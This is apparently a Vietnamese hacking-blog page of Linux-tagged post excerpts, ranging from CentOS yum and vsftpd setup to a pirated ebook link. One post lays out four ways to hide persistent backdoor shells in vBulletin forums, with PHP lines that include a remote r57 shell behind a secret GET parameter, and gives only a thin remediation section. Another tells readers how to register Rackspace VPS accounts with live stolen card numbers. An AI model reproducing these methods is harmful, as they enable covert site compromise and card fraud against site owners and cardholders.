Trang

Hiển thị các bài đăng có nhãn Linux. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Linux. Hiển thị tất cả bài đăng

Sym root bypass open port nếu server cho chạy python


Đầu tiên mọi người có thể kiểm tra xem có gói python đc cài trên server chưa
dùng lệnh python -h xem có trả về kết quả gì ko nè.

Nếu có chạy thì tạo đoạn code python sau lưu vào file capuchino.py

Xem Thêm

 

Linux Advance

- Để đáp ứng nhu cầu tìm hiểu của những ai thật sự muốn tìm hiểu, bắt đầu từ hôm nay mình sẽ post lần lượt từng bài lab của chương trình Linux Advance. Mỗi tuần post một bài nhé . (Xem nội dung chương trình Linux Advance trên trang Nhất Nghệ)

- Mục tiêu đề ra là: Xây dựng một hệ thống DataBase Server, Web Server và Firewall chạy ở chế độ Load Balancing trên nền Linux với mức độ "available" đến 99%.

- Sẽ post tuần tự từng bài lab theo thứ tự sau:

Bài Lab 1: Building MySQL Database Replication
Bài Lab 2: Building Linux Cluster
Bài Lab 3: Building MySQL Database Replication và Failover
Bài Lab 4: Building Web Servers kết nối đến Database Servers
Bài Lab 5: Building Web Servers Load Balacing & Failover
Bài Lab 6: Building Firewall server
Bài Lab 7: Building Firewall Load Balancing & Failover.

http://up.4share.vn/f/4c7f7d7b7c75797d/L...dvance.doc
CEH

Xem Thêm

 

Hướng dẫn cài đặt các gói rpm trên CD/DVD CentOS sử dụng yum

Những ai đã dùng CentOS chắc cũng đã biết lệnh yum; mặc định sau khi cài CentOS xong (ở đây tui ví dụ bản CentOS 5.5 Final), việc sử dụng yum để cài đặt phần mềm bắc buộc phải có internet, tình trạng này có thể khó khăn cho những người không có internet. Cũng chính vì điều này cho nên các phần mềm và thư viện thông dụng cũng đã được tích hợp vào DVD CentOS, và làm thế nào để tiến hành cài đặt phần mềm từ DVD sử dụng yum? Ta chỉ cần thực hiện các bước đơn giản sau (đừng quên cho đĩa CentOS vào):

- Di chuyển tới thư mục yum.repos.d :


Mã:
cd /etc/yum.repos.d/

- Đổi tên file CentOS-Base.repo thành CentOS-Base.repo.bak (phòng xa):
Mã:
mv CentOS-Base.repo CentOS-Base.repo.bak

- Dùng trình soạn thảo để thay đổi nội dung file CentOS-Media.repo như sau:
Trích dẫn:[c5-media]
name = CentOS-$releaserver - Media
baseurl=file:///media/CentOS/
file://media/cdrom/
file:///media/cdrecorder/
file:///media/CentOS_5.5_Final/
gpgcheck=1
enabled=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-5

Việc tiếp theo, ta tiến hành cài đặt thử:
Mã:
yum install gcc* -y

Chúc thành công ...

Xem Thêm

 

Ebook Collection [Linux, Exploits, Networking, Programming]


EBOOKS INCLUDED

Exploit Folder

  • Extreme Exploits - Advanced Defenses Against Hardcore Hacks
  • Hacking - The Art Of Exploitation
  • Shellcoder's Programming Uncovered
  • The Shellcoder's Handbook - Discovering And Exploiting Security Holes

Programming Folder


  • Hacker Disassembling Uncovered
  • Learning PHP & MySQL
  • Michael - Mastering UNIX Shell Scripting

C / C++
  • C By Example
  • C In a Nutshell
  • C Primer Plus, 5th Edition
  • C-C++ Programmer's Reference, 3rd Edition
  • Cryptography In C And C++
  • Effective C++, 3rd Edition
  • Optimizing C++
  • Programming Embedded Systems In C And C++
  • Secure Programming Cookbook For C And C++

Linux
  • Assembly Language Step-By-Step - Programming With DOS And Linux, 2nd Edition
  • Beginning Linux Programming
  • Burtch - Linux Shell Scripting with Bash
  • Glass,Ables - Linux for Programmers and Users
  • Guide To Assembly Language Programming In Linux
  • Korn Shell Unix and Linux Programming Manual,
  • Matthew - Beginning Linux Programming
  • Mitchell - Advanced Linux Programming
  • Wall - Linux Programming Unleashed

Perl
  • Advanced Perl Programming, 2nd Edition
  • Beginning Perl Web Development - From Novice To Professional
  • Intermediate Perl
  • Learning Perl Objects, References, & Modules
  • Learning Perl, 4th Edition
  • Minimal Perl For UNIX And Linux People
  • Perl Best Practices
  • Perl Hacks - Tips And Tools For Programming Debugging And Surviving
  • Perl Medic - Transforming Legacy Code

Hacking Folder


  • Hacker Linux Uncovered
  • Hacker's Delight
  • Hacker's Guide
  • Hacker's Handbook
  • Hackers_Secrets
  • Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition
  • Hacking For Dummies
  • Honeypots - Tracking Hackers
  • The Art Of Intrusion - The Real Stories Behind The Exploits Of Hackers, Intruders, And Deceivers

Web
  • Firefox Hacks - Tips & Tools For Next-Generation Web Browsing
  • Google Hacking For Penetration Testers
  • Google Hacks, 3rd Edition
  • Hacker Web Exploitation Uncovered
  • Web Hacking - Attacks And Defense

Networking Folder


  • Advanced Linux Networking
  • Hack The Stack - Using Snort And Ethereal To Master The 8 Layers Of An Insecure Network
  • OpenVPN - Building And Integrating Virtual Private Networks

Programming
  • Illustrated TCP-IP - A Graphic Guide To The Protocol Suite
  • Prentice Hall - Internetworking with TCP-IP, Volume I - Principles, Protocols and Architecture
  • Prentice Hall - Internetworking with TCPIP - Vol 3 Client-Server Programming and Applications for the BSD Sockets Version.
  • Tcp Ip For Dummies
  • TCP-IP Foundations (2004)
  • TCP-IP Network Administration,
  • TCPIPTools
  • Understanding TCP-IP
  • Unix Network Programming - Volume I - The Sockets Networking API,

Security
  • Cryptography And Network Security,
  • Designing And Implementing Linux Firewalls And QoS
  • Firewall Policies And VPN Configurations
  • Fundamentals of Network Security
  • LANSecurity
  • Maximum Computer Security-A Hacker's Guide to Protecting Your Internet Site and Network
  • McGraw Hill - Hacking Exposed - Network Security, Secrets and Solutions, 3rd Ed
  • Network Security Assessment - From Vulnerability To Patch
  • Network Security Hacks - 100 Industrial-Strength Tips & Tools,
  • Network Security With OpenSSL
  • Self-Defending Networks - The Next Generation Of Network Security

Unix Folder


BSD
  • Absolute BSD - The Ultimate Guide To FreeBSD
  • Absolute OpenBSD - Unix For The Practical Paranoid
  • Embedded FreeBSD Cookbook (2002)
  • Learning the UNIX Operating System
  • Mastering FreeBSD And OpenBSD Security
  • SysAdmin - Security Tools in FreeBSD
  • Teach Yourself FreeBSD In 24 Hours
  • The Complete FreeBSD, 4th Edition
  • The OpenBSD 4.0 Crash Course
  • Unix Power Tools, 3rd Edition

Kernel
  • linuxKernelSux
  • OReilly.Understanding.The Linux Kernel 1st Edition
  • Understanding The Linux Kernel, 3rd Edition

Linux
  • A Practical Guide To Linux Commands, Editors, And Shell Programming
  • Get_Acquainted_with_Linux_Security_and_Optimizatio n_System
  • Hack Proofing Linux - A Guide To Open Source Security
  • Linux Basic Commands
  • Linux Kernel Development, 2nd Edition
  • Linux Kernel module programming guide 1
  • Linux Shell Scripting With Bash (2004)
  • Linux_Administration_Made_Easy
  • Linux_Administrators_Security_Guide
  • McGraw.Hill.HackNotes.Linux.and.Unix.Security.Port able.Reference.eBook-DDU
  • OReilly - Linux_Network_Administrator's_Guide_Second_Edition
  • Sam teach you Linux in 24 hours
  • Securing Linux A Survival Guide for Linux Security Version 1.0 2003
  • Securing Linux Servers for Service Providers
  • SELinux (2004)

Shell
  • shell-scripting
  • tcsh
  • Unix Shell Programming, 3rd Edition (2003)

SQL Folder


  • Mastering_MySQL_4.2003.Sybex
  • MySQL - 2nd Edition (Sams)
  • MySQL - Essential Skills (2004)
  • MySQL - Visual QuickStart Guide, 2nd Edition (2006)
  • MySQL Certification Study Guide (2004)
  • MySQL Cookbook (2002)
  • MySQL Cookbook
  • MySQL Pocket Reference (2003)
  • MySQL Tutorial (2003)
  • MySQL.PHP.Database.Applications
  • SQL - A Beginner's Guide, 2nd Edition (2003)
  • SQL - Practical Guide For Developers (2005)
  • SQL Bible (2003)
  • SQL Cookbook (2005)
  • SQL For Dummies, 6th Edition (2006)
  • SQL Sams Teach Yourself MySQL in 21 Days -- SAMS
  • SQL Server 2000

DOWNLOAD


http://www.multiupload.com/0UTEX76FE9

Nguồn: hackforums.net

Xem Thêm

 

Phương pháp phát hiện và loại bỏ shell trong Database!

Có nhiều bạn hỏi tôi cách để phát hiện shell khi hacker include vào Database? Hôm nay tôi làm tut này để trả lời câu hỏi trên và giúp các bạn nhận thức thêm về vấn đề bảo mật.
Trước hết ta phải biết cách thức mà hacker include vào Data thế nào thì sau đó mới có phương pháp để loại bỏ triệt để.
Tôi xin nói thêm trong vbb những table có thể lợi dụng để include shell vào là table_template và table_plugin.
Vậy làm thế nào để phát hiện shell khi đã được include vào 2 table này nhỉ?Cách làm như sau:
- Bạn vào Phpadmin của host và search từ khóa

Code:
base64
Và làm theo hướng dẫn như hình sau:
Tại sao ta phải search từ khóa base64 mà không phải là từ khóa khác ?
Xin thưa rằng tất cả các con shell hiện nay nếu không được mã hóa thì sẽ bị antivirut tiêu diệt trừ khi đổi tên file thành file.txt
- Việc còn lại của bạn là mở table khả nghi ra và kiểm tra xem có gì đặc biệt khác thường trong đó không.
Chú ý:
- Đối với table plugin thì bạn có thể delete đi mà không ảnh hưởng gì đến việc hoạt động site.
- Đối với table template nếu bạn thích thì cũng có thể delete còn muốn dùng lại skin đó thì hãy vào admincp rồi nhấn vào revert để vbb tự động edit lại skin cho bạn.
- Bạn có thể áp dụng cách này với những code khác như wordpress, joomla, new, shop, etc…

Xem Thêm

 

Phương pháp include shell trong source VBB và cách phòng chống

Mình viết bài này để giúp tăng cường bảo mật cho forum của các bạn, cho các bạn thấy được cách thức mà hacker đột nhập vào trang web các bạn để từ đó có cách phòng tránh. Mình không khuyến khích các bạn làm theo để thực hiện ý đồ xấu.
Viết tut này cũng có mặt lợi và mặt hại của nó nhưng nếu các bạn biết áp dụng cho mục đích lương thiện thì nó sẽ giúp ích rất nhiều cho bạn

I/Phương diện hacker – upload shell
Bỏ qua phần làm thế nào hacker có shell trên host, mình chỉ nói đến việc hacker đã khai thác file config và hoàn toàn chiếm quyền admin của website bạn. Sau đây mình sẽ liệt kê một cách gần như đầy đủ các phương pháp mà hacker có thể chèn shell và ẩn nó trong forum của bạn để có thể dễ dàng trong những cuộc tấn công tiếp theo. 
Method 1: tạm gọi là up shell qua việc edit teamplate (cách này gần giống với kiều RFI-remote file include)
Bạn lần lượt làm như sau:
Vào admincp –>Plugin manager –>Add new plugin Ở phần HOOK Location bạn chọn là : CACHE_TEMPLATE nhé,
Phần Name: có thể đặt tên tùy ý
Phần plugin php code hãy dùng đoạn code sau để include shell:

Code:
{ 
if($_GET['nameshell']=="heloworld"){ 
include('http://localhost/r57new.php'); 
} 
}
Nhớ kích vào nút đồng ý (yes) để active plugin này nhé .
Bây giờ cùng test nhé ở đây mình test trên localhost.
bạn thêm phần ?nameshell=helloworld vào sau:
index.php hoặc image.php, online.php hay bất cứ file php nào ở ngoài index của host, cái này tùy thuộc vào bạn
Ở đây mình thử với index.php nhé
Method 2: chèn shell bằng cách edit file .php có trong host
Bạn tìm những file mà admin ít để ý để chèn đoạn code sau vào nhé, có thể chèn vào bất cứ đâu mà bạn muốn.
if ($_REQUEST['nameshell']=="helloworld") {  include ("http://localhost/r57new.php");  }
Demo: mình edit file announcement.php
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.7.2
|| # ---------------------------------------------------------------- # ||
|| # Copyright ©2000-2007 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/
if ($_REQUEST['nameshell']=="helloworld") {  include ("http://localhost/r57new.php");  }
// ######################## SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE);

// ##################### DEFINE IMPORTANT CONSTANTS #######################
define('THIS_SCRIPT', 'announcement');

// #################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array(
    'postbit',
    'reputationlevel',
    'posting',
Hưởng thụ thành quả lao động nào
Method 3: là cách import file xml qua plugin
Bạn lần lượt làm như sau:
Plugins & Products –> Download / Upload Plugins –> chọn lấy con shell xml và import vào. (đính kèm ở bài viết)
Bạn có thể mở source file shell xml lên và thay subscriptions.php bằng repair.php hoặc faq.php (bất cứ file .php nào trong admincp mà bạn nghĩ admin site đó sẽ không chú ý đến). Bạn cũng có thể import vào nhiều file cho chắc ăn
cách run shell cũng khá đơn giản là bạn import shell vào file nào thì run file đó thôi chẳn hạn tôi import shell vào file subscriptions.php tôi sẽ run shell như thế này admincp / subscriptions.php làm theo tương tự với những file khác
demo here:
Method 4: import shell qua skin
Bạn lần lượt làm như sau:
Styles & Templates –> Download / Upload Styles –> chọn shell để upload (đính kèm ở bài viết)
Bạn muốn thêm shell vào skin nào thì ở phần Merge Into Style chọn skin đó.
Và đây là kết quả
Cũng cool đó nhỉ ^^!
II/Phương diện webmaster – giải quyết sự cố bị hack
Tiếp sau đây mình xin hướng dẫn các bạn cách clear shell trên host:
- Đầu tiên bạn sẽ phải quan sát thật kĩ xem có file nào lạ không.
- Tiếp theo bạn hãy download source forum về và dùng antivirut để check shell nếu hacker chỉ up shell thông thường lên forum và không dấu nó. Bạn chú ý xem kĩ những folder trong forum như include, modcp …
Nếu shell đã được mã hóa thì anti sẽ không check ra tốt nhất là nên up một source forum mới lên thay thế source forum cũ.
- Đối vời shell được chèn vào database và source thì tùy theo từng dạng ta có phương pháp phòng chống riêng
+ Method 1: đợi suy nghĩ xong rồi post tiếp
+ Method 2: upload new source như đã nói ở trên.
+ Method 3: bạn vào Plugin Manager bạn bắt đầu tìm với cột Hook Location nếu tìm thấy phần nào có init_startup thì đó chính là con shell mà hacker đã include vào
+ Method 4: remove skin bị đính kèm shell
Bài viết có sử dụng tư liệu của mafia_boy,quang hùng, ly0kha, alucar,meoconx …

Xem Thêm

 

[TUT] VPS Win/Linux UK Chất

Nguyên liệu: CCV live là được, sock VN cũng reg được nhưng tốt nhất là trùng state.
Max cấu hình là 32GB RAM, 8 CPUs:
Có thể tạo được tối đa 10 VPS/ 1 account cloud.

 
Site:  http://www.rackspace.com/
Nó sẽ auto call đếnđọc 4 số PIN, nhập đúng 4 số đấy là activate được acc. Chỗ add CCV thì add con nào live là được, ko cần balance nhiều.

Sau khi activate acc, AE vào đây làm theo hướng dẫn của nó: Comment  !

Xem Thêm

 

Cách tạo user FPT trên VPS linux

đây là tut cài User FTP trên VPS CentOS đã cài đặt Apache, MySQL, PHP CentOS 

Đầu tiên là Vps đã cài Vsftpd 
Trên cửa sổ 
# chkconfig vsftpd on

Khởi động dịch vụ FTP

# service vsftpd start

# useradd ccv
# passwd adminccvug

Sẽ tạo ra một folder là /home/ccv, và ftp user này có quyền xem tùm lum kể cả thư mục root, vậy làm cách nào để phân quyền cho user này ?

Để ngăn việc này ta làm ntn??

Để ngăn không cho user trên SSH vào server và giới hạn thư mục của user FTP ta có thể làm như sau:
1. Không cho SSH và server :
- Thay đổi login shell thành /sbin/nologin :

Code:
root@ccv[/]# useradd ccv
root@ccv [/]# cat /etc/passwd | grep ccv
ccv:x:32025:32026::/home/ccv:/bin/bash
root@ccv [/]# usermod -s /sbin/nologin ccv
root@ccv [/]# cat /etc/passwd | grep ccv
ccv:x:32025:32026::/home/ccv:/sbin/nologin
root@ccv [/]#


=> Phần login shell của user đã được thay đổi.
- Hoặc khi tạo user mới các bạn thêm option -s /sbin/nologin vào 
Code:
root@ccv [/]# useradd -s /sbin/nologin ccv


2. Giới hạn thư mục trong FTP (chroot) :
- Chỉnh sửa file config của vsfpt :
Code:
root@ccv [/]# vi /etc/vsftpd/vsftpd.conf


- Sửa dòng này :
Code:
chroot_local_user=YES


- Restart lại vsftp :
Code:
root@training [/]# /etc/init.d/vsftpd restart

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương